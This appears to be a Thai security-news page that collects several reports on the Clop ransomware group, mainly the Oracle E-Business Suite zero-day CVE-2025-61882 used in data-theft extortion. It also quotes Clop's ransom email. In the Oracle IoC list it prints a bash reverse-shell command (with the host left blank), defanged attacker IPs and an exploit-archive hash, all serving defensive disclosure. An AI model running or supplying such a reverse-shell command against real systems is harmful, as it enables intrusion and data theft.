Logitech บริษัทยักษ์ใหญ่ด้านอุปกรณ์เสริม hardware ได้ออกมายืนยันว่าบริษัทประสบเหตุการณ์ข้อมูลรั่วไหลในเหตุการณ์การโจมตีทางไซเบอร์ ซึ่งกลุ่ม Clop อ้างว่าเป็นผู้ก่อเหตุ โดยกลุ่มดังกล่าวเคยก่อเหตุขโมยข้อมูลจาก Oracle E-Business Suite เมื่อเดือนกรกฎาคมที่ผ่านมา (more…)

Envoy Air เป็นสายการบินระดับภูมิภาคในเครือของ American Airlines ยืนยันว่าข้อมูลจากแอปพลิเคชัน Oracle E-Business Suite ของบริษัทถูกโจมตี หลังจากที่กลุ่มเรียกค่าไถ่ Clop ได้ระบุชื่อ American Airlines ไว้ในเว็บไซต์ที่เผยแพร่ข้อมูลรั่วไหลของตน (more…)

Oracle ออกคำเตือนเกี่ยวกับช่องโหว่ Zero-day ระดับ critical ในระบบ E-Business Suite ซึ่งมีหมายเลข CVE-2025-61882 โดยช่องโหว่นี้ทำให้ผู้โจมตีสามารถรันโค้ดที่เป็นอันตรายจากระยะไกลได้โดยไม่ต้องผ่านการยืนยันตัวตน และช่องโหว่นี้กำลังถูกนำไปใช้จริงในการโจมตีเพื่อขโมยข้อมูลจากกลุ่ม Clop

ช่องโหว่นี้อยู่ในผลิตภัณฑ์ Oracle Concurrent Processing ของ Oracle E-Business Suite (component: BI Publisher Integration) และมีคะแนน CVSS 9.8 เนื่องจากไม่ต้องผ่านการยืนยันตัวตน และสามารถถูกโจมตีได้ง่าย

ตามที่ Oracle ระบุไว้ในเอกสารคำแนะนำฉบับใหม่ว่า “การแจ้งเตือนด้านความปลอดภัยฉบับนี้มีขึ้นเพื่อจัดการกับช่องโหว่ CVE-2025-61882 ในระบบ Oracle E-Business Suite”

ช่องโหว่นี้สามารถถูกโจมตีจากระยะไกลได้โดยไม่ต้องผ่านการยืนยันตัวตน โดยผู้โจมตีสามารถใช้ประโยชน์จากช่องโหว่นี้ผ่านเครือข่ายได้ โดยไม่จำเป็นต้องมีชื่อผู้ใช้ หรือรหัสผ่าน และหากการโจมตีสำเร็จ อาจส่งผลให้เกิดการรันโค้ดที่เป็นอันตรายจากระยะไกลได้

Oracle ยืนยันว่า ช่องโหว่แบบ zero-day ดังกล่าว ส่งผลกระทบต่อระบบ Oracle E-Business Suite เวอร์ชัน 12.2.3 ถึง 12.2.14 และได้ออกแพตซ์อัปเดตฉุกเฉิน (emergency update) เพื่อแก้ไขช่องโหว่นี้แล้ว

บริษัทระบุว่า ลูกค้าจะต้องติดตั้ง Critical Patch Update ประจำเดือนตุลาคม 2023 ก่อน จึงจะสามารถติดตั้งแพตซ์อัปเดตความปลอดภัยชุดใหม่ได้

เนื่องจากมีการเปิดเผย PoC exploit ออกมาแล้ว และช่องโหว่นี้กำลังถูกใช้ในการโจมตีจริง จึงจำเป็นที่ผู้ดูแลระบบ Oracle จะต้องติดตั้งอัปเดตความปลอดภัยโดยเร็วที่สุด

ช่องโหว่ zero-day ดังกล่าวถูกนำไปใช้ในการโจมตีเพื่อขโมยข้อมูลโดยกลุ่ม Clop

แม้ว่า Oracle จะไม่ได้ระบุอย่างชัดเจนว่าช่องโหว่นี้เป็น zero-day แต่บริษัทได้เปิดเผย Indicators of Compromise (IoCs) ซึ่งสอดคล้องกับโค้ดการโจมตีใน Oracle EBS ที่กลุ่มผู้โจมตีแชร์กันเมื่อไม่นานมานี้บน Telegram

Charles Carmakal ประธานเจ้าหน้าที่ฝ่ายเทคนิค (CTO) ของ Mandiant – Google Cloud ยืนยันว่าช่องโหว่ CVE-2025-61882 และช่องโหว่อื่น ๆ ที่ Oracle แก้ไขไปเมื่อเดือนกรกฎาคมนั้น ถูกกลุ่มแรนซัมแวร์ Clop นำไปใช้โจมตี และขโมยข้อมูลจากเซิร์ฟเวอร์ Oracle E-Business Suite ในเหตุการณ์การขโมยข้อมูลเมื่อเดือนสิงหาคม 2025

Carmakal ระบุผ่าน LinkedIn ว่า “กลุ่ม Clop ได้ใช้ช่องโหว่หลายรายการใน Oracle EBS เพื่อขโมยข้อมูลจำนวนมากจากเหยื่อหลายรายในเดือนสิงหาคม 2025”

Carmakal ระบุเพิ่มเติมว่า มีการใช้ช่องโหว่หลายรายการในการโจมตี รวมถึงช่องโหว่ที่ถูกแพตช์ไปแล้วในการอัปเดตของ Oracle เมื่อเดือนกรกฎาคม 2025 และช่องโหว่ที่เพิ่งถูกแก้ไขไปเมื่อสุดสัปดาห์ที่ผ่านมา (CVE-2025-61882)

ข่าวเกี่ยวกับแคมเปญการโจมตีครั้งล่าสุดของกลุ่ม Clop ถูกเผยแพร่ครั้งแรกเมื่อสัปดาห์ที่แล้ว เมื่อทีม Mandiant และ Google Threat Intelligence Group (GTIG) รายงานว่ากำลังติดตามแคมเปญใหม่ที่มีหลายบริษัทได้รับอีเมลซึ่งอ้างว่ามาจากกลุ่มผู้โจมตี

อีเมลเหล่านั้นระบุว่ากลุ่ม Clop ได้ขโมยข้อมูลจากระบบ Oracle E-Business Suite ของบริษัท และกำลังเรียกค่าไถ่เพื่อไม่ให้ข้อมูลที่ขโมยไปถูกนำออกไปเผยแพร่สู่สาธารณะ

เนื้อหาในอีเมลที่ถูกเรียกค่าไถ่ที่มีการแชร์ให้กับ BleepingComputer ระบุว่า "พวกเรา CL0P team หากคุณยังไม่เคยได้ยินข้อมูลเกี่ยวกับเรา คุณสามารถค้นหาข้อมูลเกี่ยวกับเราได้ทาง Google บนอินเทอร์เน็ต"

“เราเพิ่งโจมตีไปที่ระบบ Oracle E-Business Suite ของคุณได้สำเร็จ และได้ Copy เอกสารจำนวนมากออกมา ตอนนี้ไฟล์ส่วนตัวทั้งหมด และข้อมูลอื่น ๆ ของคุณถูกเก็บอยู่ในระบบของเราแล้ว”

กลุ่ม Clop มีประวัติยาวนานในการใช้ประโยชน์จากช่องโหว่แบบ zero-day ทำการโจมตีเพื่อขโมยข้อมูลครั้งใหญ่หลายครั้งในช่วงหลายปีที่ผ่านมา อาทิเช่น

ปี 2020: ใช้ช่องโหว่แบบ zero-day ในแพลตฟอร์ม Accellion FTA ส่งผลกระทบกับบริษัทเกือบ 100 องค์กร
ปี 2021: ใช้ช่องโหว่แบบ zero-day ในซอฟต์แวร์ SolarWinds Serv-U FTP
ปี 2023: ใช้ช่องโหว่แบบ zero-day ในแพลตฟอร์ม GoAnywhere MFT โจมตีบริษัทมากกว่า 100 องค์กร
ปี 2023: ใช้ช่องโหว่แบบ zero-day ในระบบ MOVEit Transfer ซึ่งถือเป็นแคมเปญที่ใหญ่ที่สุดของกลุ่ม Clop จนถึงปัจจุบัน ทำให้สามารถขโมยข้อมูลจาก 2,773 องค์กรทั่วโลก
ปี 2024: ใช้ช่องโหว่ zero-day จำนวนสองรายการในระบบ Cleo file transfer (CVE-2024-50623 และ CVE-2024-55956) เพื่อขโมยข้อมูล และเรียกค่าไถจากบริษัทต่าง ๆ

ในเวลาต่อมากลุ่ม Clop ได้ยืนยันกับ BleepingComputer ว่า พวกเขาอยู่เบื้องหลังอีเมลเรียกค่าไถ่ และระบุว่าพวกเขาใช้ประโยชน์จากช่องโหว่ Oracle zero-day เพื่อขโมยข้อมูล

อย่างไรก็ตาม ในช่วงแรก Oracle ได้เชื่อมโยงแคมเปญการเรียกค่าไถ่ของกลุ่ม Clop เข้ากับช่องโหว่ที่ถูกแพตช์ไปแล้วในเดือนกรกฎาคม 2025 แทนที่จะเป็นช่องโหว่ zero-day ตัวใหม่ ที่ภายหลังถูกยืนยันว่าเป็นช่องโหว่ที่ใช้ในการโจมตีครั้งนี้

Oracle ได้เปิดเผย IoCs สำหรับการโจมตีจากช่องโหว่ zero-day ซึ่งมี 2 IP addresses ที่พบว่าถูกใช้ในการโจมตีเซิร์ฟเวอร์ และคำสั่งที่ใช้เปิด remote shell รวมไปถึง exploit archive และไฟล์ที่เกี่ยวข้องในการโจมตี ดังนี้

200[.]107[.]207[.]26 - IP address ที่เชื่อมโยงกับการโจมตี (HTTP GET และ POST requests)
185[.]181[.]60[.]11 - IP address ที่เชื่อมโยงกับการโจมตี (HTTP GET และ POST requests)
sh -c /bin/bash -i >& /dev/tcp// 0>&1 - คำสั่งที่เรียกใช้งาน reverse shell
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d - oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.

ปัจจุบันมีเซิร์ฟเวอร์ CrushFTP กว่า 1,000 เครื่องที่เข้าถึงได้บนอินเทอร์เน็ติ ซึ่งมีช่องโหว่ระดับ critical ที่สามารถถูกโจมตีเพื่อเข้าควบคุมการใช้งานผ่านอินเทอร์เฟซเว็บในฐานะแอดมินได้ (more…)

Ascension ซึ่งเป็นหนึ่งในระบบบริการสุขภาพเอกชนที่ใหญ่ที่สุดในสหรัฐอเมริกา ได้เปิดเผยว่าข้อมูลส่วนบุคคล และข้อมูลด้านสุขภาพของผู้ป่วยมากกว่า 430,000 ราย ถูกเปิดเผยในเหตุการณ์การละเมิดข้อมูลที่ถูกเปิดเผยเมื่อเดือนที่ผ่านมา (more…)

Exploit สำหรับโจมตีช่องโหว่การตรวจสอบสิทธิ์ของ GoAnywhere MFT ถูกปล่อยออกมาแล้ว

ล่าสุด Exploit code สำหรับโจมตีช่องโหว่ authentication bypass ระดับ Critical ในซอฟต์แวร์ GoAnywhere MFT (Managed File Transfer) ของ Fortra ซึ่งจะทำให้ผู้โจมตีสามารถสร้างชื่อผู้ใช้ที่เป็นผู้ดูแลระบบบนอินสแตนซ์ที่มีช่องโหว่ผ่านทางพอร์ทัลของผู้ดูแลระบบได้ (more…)

กลุ่ม Clop ransomware กำลังเลียนแบบวิธีการของกลุ่ม ALPHV ransomware โดยการสร้างเว็บไซต์สำหรับเผยแพร่ข้อมูลที่ถูกขโมยมาของเหยื่อ ที่สามารถเข้าถึงได้บนอินเทอร์เน็ตสาธารณะ ทำให้ข้อมูลที่ถูกขโมยมาถูกเข้าถึงได้ง่ายขึ้น และสร้างความกดดันกับเหยื่อให้ยอมจ่ายค่าไถ่มากขึ้น

เมื่อกลุ่ม ransomware โจมตีเป้าหมาย ขั้นแรกมันจะขโมยข้อมูลจากเครือข่ายของเหยื่อ แล้วจึงเข้ารหัสไฟล์ โดยข้อมูลที่ถูกขโมยมานี้จะถูกใช้เป็นช่องทางในการข่มขู่เหยื่อว่าข้อมูลจะถูกเผยแพร่ออกสู่สาธาณะ ถ้าหากไม่ยอมจ่ายค่าไถ่ (more…)

หลังจากการหยุดปฏิบัติการไปหลายเดือนตั้งแต่ช่วงเดือนพฤศจิกายนจนถึงกุมภาพันธ์ ตอนนี้ Clop ransomware กลับมาแล้ว จากรายงานของนักจัยจาก NCC Group

"CL0P กลับมาอยู่ในระดับแนวหน้าของภัยคุกคามจากแรนซัมแวร์ โดยเพิ่มขึ้นจากการที่มีความเคลื่อนไหวน้อยที่สุดในเดือนมีนาคม มาเป็นมีความเคลื่อนไหวมากที่สุดลำดับที่สี่ในเดือนเมษายน"

ปฏิบัติการที่เพิ่มขึ้นนี้ถูกพบหลังจากกลุ่ม CL0P เพิ่มรายการเหยื่อรายใหม่กว่า 21 รายภายในเดือนเมษายนเพียงเดือนเดียว บนไซต์ที่ใช้รายงานข้อมูลรั่วไหลของเหยื่อของพวกเขา

"มีความเปลี่ยนแปลงที่น่าสนใจในการรายงานในเดือนเมษายน ในขณะที่ Lockbit 2.0 มีเหยื่อ 103 ราย และ Conti มีเหยื่อ 45 ราย ซึ่งยังคงเป็นกลุ่มผู้โจมตีที่มากที่สุด กลุ่มเป้าหมายที่ตกเป็นเหยื่อจากการโจมตีของ CL0P กลับเพิ่มขึ้นอย่างมากจาก 1 รายเป็น 21 ราย" กลุ่ม NCC กล่าว

โดยเป้าหมายมากที่สุดของกลุ่ม CL0P คือภาคอุตสาหกรรม โดยคิดเป็น 45% จากการโจมตี และอีก 27% คือกลุ่มเป้าหมายบริษัทเทคโนโลยี ด้วยเหตุนี้ NCC Group จึงแจ้งเตือนองค์กรต่างๆ ที่อยู่ในกลุ่มเป้าหมายของกลุ่ม ransomware ให้เฝ้าระวัง และเตรียมความพร้อม

อย่างไรก็ตาม กลุ่ม CL0P ransomware กลับดูเหมือนจะไม่มีการเคลื่อนไหวมากนักหลังจากที่ปล่อยรายชื่อเหยื่อรวดเดียวกว่า 21 รายดังกล่าว

ในขณะที่เหยื่อรายล่าสุดได้รับการยืนยันว่าเป็นการโจมตีครั้งใหม่ แต่ในอีกทฤษฎีหนึ่งก็คือกลุ่ม CL0P อาจยุติปฏิบัติการแล้วจริงๆหลังจากที่หยุดปฏิบัติการไปหลายเดือน โดยการเผยแพร่ข้อมูลของเหยื่อล่าสุด คือเหยื่อที่ยังไม่ได้ถูกปล่อยข้อมูลออกมาก่อนหน้านี้ ซึ่งก็คล้ายกันกับกลุ่ม Conti ที่กำลังทำอยู่ซึ่งเป็นส่วนหนึ่งของการยุติปฏิบัติการ

ในขณะที่มุ่งเป้าโจมตีไปที่เหยื่อทั่วโลกตั้งแต่ปี 2019 (เหยื่อบางราย ได้แก่ Maastricht University, Software AG IT, ExecuPharm และ Indiabulls) กลุ่ม CL0P ก็ยังถูกเชื่อมโยงเข้ากับการโจมตี Accellion ในการโจมตี Accellion กลุ่ม CL0P ได้ทำการขโมยข้อมูลจำนวนมากจากหลายบริษัทที่มีชื่อเสียงโดยใช้ File Transfer Appliance (FTA) ของ Accellion

ต่อมา CL0P ใช้ข้อมูลที่ขโมยมาเพื่อเรียกค่าไถ่กับบริษัท โดยบีบให้ต้องจ่ายค่าไถ่จำนวนมากเพื่อไม่ให้ข้อมูลถูกเผยแพร่ รายชื่อบริษัทที่ถูกขโมยข้อมูลจาก Accellion FTA ได้แก่ บริษัทพลังงานยักษ์ใหญ่อย่าง Shell, บริษัทรักษาความปลอดภัยทางไซเบอร์ Qualys, ซูเปอร์มาร์เก็ตยักษ์ใหญ่ Kroger และมหาวิทยาลัยหลายแห่งทั่วโลก( University of Colorado, University of Miami, Stanford Medicine, University of Maryland บัลติมอร์ (UMB) และมหาวิทยาลัยแคลิฟอร์เนีย)

ที่มา : bleepingcomputer